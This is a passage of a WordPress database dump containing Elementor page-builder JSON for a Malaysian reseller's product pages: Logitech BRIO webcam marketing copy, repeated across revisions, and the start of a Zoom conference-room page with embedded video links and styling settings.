Hello\\u2122<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"89e09c5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9d928f1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/briopictograms-1.png\",\"id\":2990},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f1b40ef\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ffa8ec9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"acd0c54\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>A NEW BENCHMARK FOR WEBCAMS<\\/h2><p>Step up to the world\\u2019s most technologically advanced webcam and get professional-quality video for video conferencing, streaming, or recording. Logitech BRIO is packed with features that produce stunning video in any environment. Our premier 4K ultra high-def camera offers 5x digital zoom, high frame rates, outstanding low-light performance, HDR, and RightLight\\u2122 3.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ab9e0f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f1b50b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"space_between_widgets\":-10},\"elements\":[{\"id\":\"0b9f29a\",\"elType\":\"widget\",\"settings\":{\"title\":\"KEY FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b6a2832\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23ab01a\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"1ca51fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":62.581},\"elements\":[{\"id\":\"f2934d6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/briopictograms-1.jpg\",\"id\":2992}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ec48173\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":37.416},\"elements\":[{\"id\":\"bac33cd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>CAPTURE EVERY DETAIL IN 4K HD<\\/h3><p>Stream crystal-clear video with superb resolution, frame rate, color, and detail. Logitech BRIO delivers 4K Ultra HD at 30 fps or 1080p at either 30 or an ultra-smooth 60 fps for outstanding clarity, smoothness, and detail. Get a closer look with 5x zoom.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a6738d0\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"811eef0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f989bbf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>LOOK GREAT IN ANY LIGHT<\\/h3><p>Now you can use your video conferencing, streaming, and video recording applications in any lighting condition \\u2013 and always look your best. Whether in low light or bright sunshine, Logitech BRIO with RightLight\\u2122 3 and high dynamic range (HDR) technology adjusts to highlight the most important subject: you.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0a5f81\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"936ba59\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/briopictograms.jpg\",\"id\":2993}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cf2d1fc\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"a3a95ea\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":63.441},\"elements\":[{\"id\":\"5257f5b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/briopictograms-2.jpg\",\"id\":2994}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"8a03983\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":36.556},\"elements\":[{\"id\":\"46329a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>SECURITY MEETS CONVENIENCE<\\/h3><p>Powered by both optical and infrared sensors, BRIO delivers fast and secure facial recognition for Windows Hello. No need to type a password for Windows 10: simply look into BRIO\\u2019s lens to login.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d4c77a8\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e3245b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"space_between_widgets\":-10},\"elements\":[{\"id\":\"50c4419\",\"elType\":\"widget\",\"settings\":{\"title\":\"ADDITIONAL FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"53bae29\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bb97b05\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"d8a48db\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"06ddb38\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>ADJUSTABLE FIELD OF VIEW<\\/h4><p>Choose from three field of view settings to perfectly frame your video. For an ideal head and shoulders shot, pick 65 degrees. For larger groups or to capture more of the room, choose 78 or 90 degrees.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ff1e98e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ebfd48a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>4K RECORDING<\\/h4><p>Use BRIO with software like Camera for Windows 10, XSplit Broadcaster, OBS, and SwiftCapture to record in resolutions up to 4K.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"eecae79\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"5eff684\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>SMOOTH STREAMING<\\/h4><p>BRIO retains a high frame rate whatever the lighting to match your gaming broadcast with no lag. Stream in full 1080p HD at up to 60 frames per second for smooth, fluid video that keeps up with your every move.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79b792d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"b0c8920\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>CERTIFIED FOR BUSINESS<\\/h4><p>BRIO is certified compatible with Skype for Business, Windows Hello, and Cisco Jabber\\u2122, works with Microsoft Cortana\\u00ae, and offers enhanced integration with BlueJeans, Broadsoft, LifeSize Cloud, Vidyo, and Zoom. If your preferred application can recognize a webcam, you can use it with BRIO.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6c5081b\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"bde9d3c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"757c879\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>MOUNTING &amp; PRIVACY OPTIONS<\\/h4><p>Mount the camera wherever it works best \\u2013 LCD screen, notebook, or tabletop \\u2013 with the adjustable clip, or mount BRIO on your own tripod instead. A removable shade flips down to assure privacy and peace of mind.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f194eff\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a465257\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>5X HD ZOOM<\\/h4><p>Zoom in and pan around to crop out distracting backgrounds, perfectly frame you and a friend, or capture the entire scene. BRIO\\u2019s next-generation 4K image sensor delivers HD quality without jaggies or blur, even when zoomed in.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"343f7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cfec2a4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>CAMERA SETTINGS<\\/h4><p>Customize your BRIO and access pan, zoom, and image controls with Logitech Camera Settings software for Windows and Mac.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"839ea48\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(5839,2987,'_elementor_version','0.4'),(5841,2996,'_wp_page_template','template-fullwidth.php'),(5842,2996,'_elementor_edit_mode','builder'),(5843,2996,'_elementor_template_type','post'),(5844,2996,'_elementor_data','[{\"id\":\"a2dcd03\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_hover_background\":\"classic\"},\"elements\":[{\"id\":\"31ec800\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"740db1b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>LOGITECH BRIO<\\/h2><p>Ultra HD Webcam for Video Conferencing, Streaming, and Recording<\\/p><ul><li>Spectacular video quality up to 4K<\\/li><li>Look great in any light with HDR and RightLight\\u2122 3<\\/li><li>Enhanced security with Windows Hello\\u2122<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"89e09c5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9d928f1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/briopictograms-1.png\",\"id\":2990},\"image_size\":\"medium_large\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f1b40ef\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ffa8ec9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"acd0c54\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>A NEW BENCHMARK FOR WEBCAMS<\\/h2><p>Step up to the world\\u2019s most technologically advanced webcam and get professional-quality video for video conferencing, streaming, or recording. Logitech BRIO is packed with features that produce stunning video in any environment. Our premier 4K ultra high-def camera offers 5x digital zoom, high frame rates, outstanding low-light performance, HDR, and RightLight\\u2122 3.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ab9e0f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f1b50b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"space_between_widgets\":-10},\"elements\":[{\"id\":\"0b9f29a\",\"elType\":\"widget\",\"settings\":{\"title\":\"KEY FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b6a2832\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23ab01a\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"1ca51fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":62.581},\"elements\":[{\"id\":\"f2934d6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/briopictograms-1.jpg\",\"id\":2992}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ec48173\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":37.416},\"elements\":[{\"id\":\"bac33cd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>CAPTURE EVERY DETAIL IN 4K HD<\\/h3><p>Stream crystal-clear video with superb resolution, frame rate, color, and detail. Logitech BRIO delivers 4K Ultra HD at 30 fps or 1080p at either 30 or an ultra-smooth 60 fps for outstanding clarity, smoothness, and detail. Get a closer look with 5x zoom.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a6738d0\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"811eef0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f989bbf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>LOOK GREAT IN ANY LIGHT<\\/h3><p>Now you can use your video conferencing, streaming, and video recording applications in any lighting condition \\u2013 and always look your best. Whether in low light or bright sunshine, Logitech BRIO with RightLight\\u2122 3 and high dynamic range (HDR) technology adjusts to highlight the most important subject: you.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0a5f81\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"936ba59\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/briopictograms.jpg\",\"id\":2993}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cf2d1fc\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"a3a95ea\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":63.441},\"elements\":[{\"id\":\"5257f5b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/briopictograms-2.jpg\",\"id\":2994}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"8a03983\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":36.556},\"elements\":[{\"id\":\"46329a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>SECURITY MEETS CONVENIENCE<\\/h3><p>Powered by both optical and infrared sensors, BRIO delivers fast and secure facial recognition for Windows Hello. No need to type a password for Windows 10: simply look into BRIO\\u2019s lens to login.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d4c77a8\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e3245b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"space_between_widgets\":-10},\"elements\":[{\"id\":\"50c4419\",\"elType\":\"widget\",\"settings\":{\"title\":\"ADDITIONAL FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"53bae29\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bb97b05\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"d8a48db\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"06ddb38\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>ADJUSTABLE FIELD OF VIEW<\\/h4><p>Choose from three field of view settings to perfectly frame your video. For an ideal head and shoulders shot, pick 65 degrees. For larger groups or to capture more of the room, choose 78 or 90 degrees.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ff1e98e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ebfd48a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>4K RECORDING<\\/h4><p>Use BRIO with software like Camera for Windows 10, XSplit Broadcaster, OBS, and SwiftCapture to record in resolutions up to 4K.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"eecae79\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"5eff684\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>SMOOTH STREAMING<\\/h4><p>BRIO retains a high frame rate whatever the lighting to match your gaming broadcast with no lag. Stream in full 1080p HD at up to 60 frames per second for smooth, fluid video that keeps up with your every move.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79b792d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"b0c8920\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>CERTIFIED FOR BUSINESS<\\/h4><p>BRIO is certified compatible with Skype for Business, Windows Hello, and Cisco Jabber\\u2122, works with Microsoft Cortana\\u00ae, and offers enhanced integration with BlueJeans, Broadsoft, LifeSize Cloud, Vidyo, and Zoom. If your preferred application can recognize a webcam, you can use it with BRIO.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6c5081b\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"bde9d3c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"757c879\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>MOUNTING &amp; PRIVACY OPTIONS<\\/h4><p>Mount the camera wherever it works best \\u2013 LCD screen, notebook, or tabletop \\u2013 with the adjustable clip, or mount BRIO on your own tripod instead. A removable shade flips down to assure privacy and peace of mind.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f194eff\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a465257\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>5X HD ZOOM<\\/h4><p>Zoom in and pan around to crop out distracting backgrounds, perfectly frame you and a friend, or capture the entire scene. BRIO\\u2019s next-generation 4K image sensor delivers HD quality without jaggies or blur, even when zoomed in.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"343f7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cfec2a4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>CAMERA SETTINGS<\\/h4><p>Customize your BRIO and access pan, zoom, and image controls with Logitech Camera Settings software for Windows and Mac.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"839ea48\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(5845,2996,'_elementor_version','0.4'),(6147,1620,'_elementor_data','[{\"id\":\"cad15a9\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true}},\"elements\":[{\"id\":\"e5c7499\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"96a0357\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Zoom for the Conference Room<\\/h2><h3>Software-based, flawless video, integrated audio, and wireless content sharing<\\/h3>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6457ddc\",\"elType\":\"section\",\"settings\":{\"structure\":\"33\"},\"elements\":[{\"id\":\"bdc71a2\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"3abc915\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"1901198\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/yRQGXlJS-xI\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"bcb7227\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"66635b2\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true}},\"elements\":[{\"id\":\"1e75488\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5affd82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Simple, flexible set up<\\/h3><p><span style=\\\"font-size: 0.875rem;\\\">Build the room you need with the hardware you want on top on Zoom\\u2019s cloud-based platform.<\\/span><\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d999cea\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6757f8b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Modern capabilities<\\/h3><p>Deploy scalable conferencing solutions that help you address the problems of today and opportunities of tomorrow.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2b51dbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ff854f8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Happy, productive users<\\/h3><p>We focus on delivering compelling, easy-to-use technology, so that you and your teams can focus on the task at hand.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"faaa0fe\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/Zoom-Conference-Room-Solutions_page2_image7.jpg\",\"id\":3048},\"background_position\":\"center center\",\"background_attachment\":\"scroll\",\"background_size\":\"cover\"},\"elements\":[{\"id\":\"886f41b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"a8a224a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 class=\\\"mb-1 mt-0\\\">HD video and audio<\\/h4><p class=\\\"mt-1 mb-5\\\">Bring high quality video, audio, and web conferencing to your existing rooms.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"412feda\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 class=\\\"mb-1 mt-0\\\">Wireless sharing<\\/h4><p class=\\\"mt-1 mb-5\\\">Cut the cords, cables, and dongles -- present content wirelessly from your laptop or mobile device.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"3d2b744\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 class=\\\"mb-1 mt-0\\\">Interoperability with any video system<\\/h4><p class=\\\"mt-1 mb-5\\\">Communicate with existing SIP or H.323 systems<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a34735d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"background_overlay_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_overlay_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5,\"sizes\":[]},\"css_filters_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_overlay_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_hover_opacity\":{\"unit\":\"px\",\"size\":0.5,\"sizes\":[]},\"css_filters_hover_blur\":{\"unit\"